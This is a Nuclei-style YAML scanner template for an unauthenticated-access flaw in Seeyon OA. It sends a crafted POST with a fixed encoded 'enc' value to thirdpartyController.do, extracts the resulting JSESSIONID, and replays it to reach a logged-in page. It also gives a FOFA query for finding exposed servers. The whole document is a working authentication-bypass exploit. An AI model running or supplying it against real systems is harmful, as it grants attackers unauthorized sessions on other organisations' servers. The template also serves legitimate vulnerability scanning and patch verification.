id: seeyon-unauth

info:
  name: Seeyon Unauthoried Access
  author: pikpikcu
  severity: high
  reference:
    - https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg
    - https://github.com/chaitin/xray/blob/f90cf321bc4d294bbf6625a9c4853f3bfdf0a384/pocs/seeyon-oa-cookie-leak.yml
  metadata:
    verified: true
    fofa-query: app="致远互联-OA"
  tags: misconfig,seeyon,unauth

requests:
  - raw:
      - |
        POST /seeyon/thirdpartyController.do HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: deflate

        method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4

      - |
        GET /seeyon/main.do HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Accept-Encoding: deflate
        Content-Type: application/x-www-form-urlencoded
        Cookie: {{session}}

    extractors:
      - type: regex
        name: session
        part: header
        internal: true
        regex:
          - 'JSESSIONID=(.*)'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "当前已登录了一个用户，同一窗口中不能登录多个用户"
          - "<a href='/seeyon/main.do?method=logout'"
        condition: and

      - type: status
        status:
          - 200